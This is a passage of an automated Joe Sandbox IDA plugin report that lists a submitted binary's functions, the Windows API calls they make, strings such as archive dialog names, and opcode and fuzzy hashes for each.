                                                            • String ID: MOC$RCC
                                                            • API String ID: 948111806-2084237596
                                                            • Opcode ID: b1c0ce3a4a2a0c8f64c5ba89a154094c8c2bb985970091b68c34f8ba82e84911
                                                            • Instruction ID: 411578fa3d324b8ffdd3ec01a599fbd5efc0feb43266d1edc032b23fd1ff5ed7
                                                            • Opcode Fuzzy Hash: b1c0ce3a4a2a0c8f64c5ba89a154094c8c2bb985970091b68c34f8ba82e84911
                                                            • Instruction Fuzzy Hash: 41418C71900189AFCF16DF96CC85AEEBBB5FF08304F148099FA1467262D335AA51DB50
                                                            Function 00CC7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CC7406
                                                              • Part of subcall function 00CC3BBA: __EH_prolog.LIBCMT ref: 00CC3BBF
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00CC74CD
                                                              • Part of subcall function 00CC7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CC7AAB
                                                              • Part of subcall function 00CC7A9C: GetLastError.KERNEL32 ref: 00CC7AF1
                                                              • Part of subcall function 00CC7A9C: CloseHandle.KERNEL32(?), ref: 00CC7B00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                            • API String ID: 3813983858-639343689
                                                            • Opcode ID: cdbef8601135558d66ecbba3687aa6aa44ed9a08f9f80a538878f5d810285b4a
                                                            • Instruction ID: 188aa581e67995f5f3629511d3fa2734a79ddb100ec9c1927da82714104cd8d5
                                                            • Opcode Fuzzy Hash: cdbef8601135558d66ecbba3687aa6aa44ed9a08f9f80a538878f5d810285b4a
                                                            • Instruction Fuzzy Hash: F631CFB1E04248AADF11EBA4DC45FEE7BA8EF09304F04411AF955E7282CB748B45DB61
                                                            Function 00CDAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                              • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                            • EndDialog.USER32(?,00000001), ref: 00CDAD98
                                                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00CDADAD
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CDADC2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: ASKNEXTVOL
                                                            • API String ID: 445417207-3402441367
                                                            • Opcode ID: 082750d37196c5e1c9a37a1248e3b70c0baea4c5c18e15a37c4cd6fca316bcf7
                                                            • Instruction ID: cc704650685552e3f1e95c80671eecb0c997f5ef10ed9885a3715b0a17472647
                                                            • Opcode Fuzzy Hash: 082750d37196c5e1c9a37a1248e3b70c0baea4c5c18e15a37c4cd6fca316bcf7
                                                            • Instruction Fuzzy Hash: C011E632244300BFD3219F68DC45F6A7B6AEF6B702F140012F340DB7A0C7619A16A736
                                                            Function 00CCD8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __fprintf_l.LIBCMT ref: 00CCD954
                                                            • _strncpy.LIBCMT ref: 00CCD99A
                                                              • Part of subcall function 00CD1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00D01030,00000200,00CCD928,00000000,?,00000050,00D01030), ref: 00CD1DC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                            • String ID: $%s$@%s
                                                            • API String ID: 562999700-834177443
                                                            • Opcode ID: fffb9b670144e36ad79af8796852a6b350ace242658858fe7ac7f1abb601be50
                                                            • Instruction ID: 0274a518c89143970607808cef7f5028a4d4a134e9987b1d13970aef3654199f
                                                            • Opcode Fuzzy Hash: fffb9b670144e36ad79af8796852a6b350ace242658858fe7ac7f1abb601be50
                                                            • Instruction Fuzzy Hash: 8B21D23640024CAEDB21EEA4CC05FEE7BA8AF05304F14003AFA26961A2E732D648DB51
                                                            Function 00CD0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00CCAC5A,00000008,?,00000000,?,00CCD22D,?,00000000), ref: 00CD0E85
                                                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00CCAC5A,00000008,?,00000000,?,00CCD22D,?,00000000), ref: 00CD0E8F
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00CCAC5A,00000008,?,00000000,?,00CCD22D,?,00000000), ref: 00CD0E9F
                                                            Strings
                                                            • Thread pool initialization failed., xrefs: 00CD0EB7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                            • String ID: Thread pool initialization failed.
                                                            • API String ID: 3340455307-2182114853
                                                            • Opcode ID: 9b6238dbc6fad679951e84627cdefe94e04754149691d4ed5aef6220b696eb7f
                                                            • Instruction ID: 97ad0850874dbaa98724dc38d05bf599b53ec3004bf86be774cf0e2cab7761d1
                                                            • Opcode Fuzzy Hash: 9b6238dbc6fad679951e84627cdefe94e04754149691d4ed5aef6220b696eb7f
                                                            • Instruction Fuzzy Hash: 401142B1640708ABC3215F6ADD84BABFBDCEB55754F604C2FE1DA82600DA715A408B64
                                                            Function 00CDB270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                              • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                            • EndDialog.USER32(?,00000001), ref: 00CDB2BE
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00CDB2D6
                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 00CDB304
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: GETPASSWORD1
                                                            • API String ID: 445417207-3292211884
                                                            • Opcode ID: 48d604af2611a5abb98cd81eb5f4ee9a982cf7e194b66ccb5869281fd459613f
                                                            • Instruction ID: c7221fe594dd634d5d2a45dcb1690ea2d37d1b81955fa36b69429dd7b21a9f41
                                                            • Opcode Fuzzy Hash: 48d604af2611a5abb98cd81eb5f4ee9a982cf7e194b66ccb5869281fd459613f
                                                            • Instruction Fuzzy Hash: 2711E133A00219B6DB229E659D49FFF3B6DEF19710F010026FB45F2294CBA49E42A771
                                                            Function 00CDDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                            • API String ID: 0-56093855
                                                            • Opcode ID: 89fb3c0082389b842e2146e0e58348068130b5a04f0ab08ec6c6e778796e487c
                                                            • Instruction ID: e9fe8f77a215942595a19e01174b8880244a9ccddcead5f9cf2163045053ea26
                                                            • Opcode Fuzzy Hash: 89fb3c0082389b842e2146e0e58348068130b5a04f0ab08ec6c6e778796e487c
                                                            • Instruction Fuzzy Hash: 4A015E76A04349AFDB118F55FC44AAB7BAAE708354B10442AFA4BC2331CA31D951EBB1
                                                            Function 00CE9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                            • Instruction ID: dca5b8bada69054903b2213cd211d64a7f997d63a332122d50bb88e43033809f
                                                            • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                            • Instruction Fuzzy Hash: 19A17A72A007C69FEB21DF2AC8817BEBBE5EF55310F2841ADE5959B381C2388E41C751
                                                            Function 00CCA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00CC7F69,?,?,?), ref: 00CCA3FA
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00CC7F69,?), ref: 00CCA43E
                                                            • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00CC7F69,?,?,?,?,?,?,?), ref: 00CCA4BF
                                                            • CloseHandle.KERNEL32(?,?,?,00000800,?,00CC7F69,?,?,?,?,?,?,?,?,?,?), ref: 00CCA4C6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: File$Create$CloseHandleTime
                                                            • String ID:
                                                            • API String ID: 2287278272-0
                                                            • Opcode ID: 08874bec49adb39a966ae173e9193d0d70c43383cd723800554ec9062d185f1a
                                                            • Instruction ID: b1df3c4c68b0fd447dfe45b1e300c41e6a941d0b59d2329ee5f79b29230e6cee
                                                            • Opcode Fuzzy Hash: 08874bec49adb39a966ae173e9193d0d70c43383cd723800554ec9062d185f1a
                                                            • Instruction Fuzzy Hash: AD41CF31248385AAD725DF24DC59FAEBBE4AB84308F08491DF5E1D3190D6A4DB48DB53
                                                            Function 00CC1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID:
                                                            • API String ID: 176396367-0
                                                            • Opcode ID: bd442eda82545ee759a2abd9c7944d0f68351fbe24a826656730094eb21747e6
                                                            • Instruction ID: b9b616f0f9ff8281a280dc32e29f32a83e0f5995de22f371b5ead4d43faef219
                                                            • Opcode Fuzzy Hash: bd442eda82545ee759a2abd9c7944d0f68351fbe24a826656730094eb21747e6
                                                            • Instruction Fuzzy Hash: 3E41B6719006699BCB259F69CD09AEE7BB8EF01311F04401EFD45F7341DB34AE458AB0
                                                            Function 00CEC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00CE91E0,?,00000000,?,00000001,?,?,00000001,00CE91E0,?), ref: 00CEC9D5
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CECA5E
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00CE6CBE,?), ref: 00CECA70
                                                            • __freea.LIBCMT ref: 00CECA79
                                                              • Part of subcall function 00CE8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CECA2C,00000000,?,00CE6CBE,?,00000008,?,00CE91E0,?,?,?), ref: 00CE8E38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            • Opcode ID: eb8eb0aeffbc8aee16e358da45c0b630641ba029ffccc354244473685fbe697b
                                                            • Instruction ID: fccd8347f622f2fbd09f0bb9759f4caa01c782054caef3d33c722815a1c33296
                                                            • Opcode Fuzzy Hash: eb8eb0aeffbc8aee16e358da45c0b630641ba029ffccc354244473685fbe697b
                                                            • Instruction Fuzzy Hash: 4B31D032A0024AABDF24DF66CC85EBE7BA5EB41310B044129FC15E7250EB35CE51EB90
                                                            Function 00CDA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 00CDA666
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00CDA675
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CDA683
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00CDA691
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 7b9ebd1f9fc24d79756ec4d58befa97d631f13e0066e121275a238fddcea5aec
                                                            • Instruction ID: 6682e51dd08cd82603d1eccb935c51377c3096ae7ba4cf8c88732c30896630c2
                                                            • Opcode Fuzzy Hash: 7b9ebd1f9fc24d79756ec4d58befa97d631f13e0066e121275a238fddcea5aec
                                                            • Instruction Fuzzy Hash: AAE0EC31942B21A7D2715F60AD0DB8A3E54AB25B52F010101FB09D6390DB6886028BB5
                                                            Function 00CDA80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CDA699: GetDC.USER32(00000000), ref: 00CDA69D
                                                              • Part of subcall function 00CDA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CDA6A8
                                                              • Part of subcall function 00CDA699: ReleaseDC.USER32(00000000,00000000), ref: 00CDA6B3
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 00CDA83C
                                                              • Part of subcall function 00CDAAC9: GetDC.USER32(00000000), ref: 00CDAAD2
                                                              • Part of subcall function 00CDAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00CDAB01
                                                              • Part of subcall function 00CDAAC9: ReleaseDC.USER32(00000000,?), ref: 00CDAB99
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ObjectRelease$CapsDevice
                                                            • String ID: (
                                                            • API String ID: 1061551593-3887548279
                                                            • Opcode ID: 1849bab8fa63c7581bf0a0eceadd55c04fc8caab172e6b69b323412777e70804
                                                            • Instruction ID: d2a442841180164461a85e03a1d30f6f47b70ab2b3609298fa9aa6aedbca9de7
                                                            • Opcode Fuzzy Hash: 1849bab8fa63c7581bf0a0eceadd55c04fc8caab172e6b69b323412777e70804
                                                            • Instruction Fuzzy Hash: C091D275604354AFD610DF25C848A2BBBE8FFC9710F00491EFA9AD3261DB30A946DF62
                                                            Function 00CC75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CC75E3
                                                              • Part of subcall function 00CD05DA: _wcslen.LIBCMT ref: 00CD05E0
                                                              • Part of subcall function 00CCA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CCA598
                                                            • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CC777F
                                                              • Part of subcall function 00CCA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA501
                                                              • Part of subcall function 00CCA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA532
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                            • String ID: :
                                                            • API String ID: 3226429890-336475711
                                                            • Opcode ID: 095fbd2c6699e147731f2a7796468cd8f49d6bb12f9d8cabd93d04ed73384edd
                                                            • Instruction ID: c638ec9dc1e7bee442f45cd3c7af10860d71cc1e18af2e116dc808a77c566db6
                                                            • Opcode Fuzzy Hash: 095fbd2c6699e147731f2a7796468cd8f49d6bb12f9d8cabd93d04ed73384edd
                                                            • Instruction Fuzzy Hash: 95416F71800158AAEB25EB64CD5AFEEB378EF45300F00819AF609A7192DB745F85DF71
                                                            Function 00CDB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: }
                                                            • API String ID: 176396367-4239843852
                                                            • Opcode ID: e91a140f377e248cfa273693019b1615bbfe44b74e51b5f4fc16efa5ac700dfe
                                                            • Instruction ID: df0fc782a0b8b11589a5078f27756ba98f7192f771efef5ce8a5a7891151139a
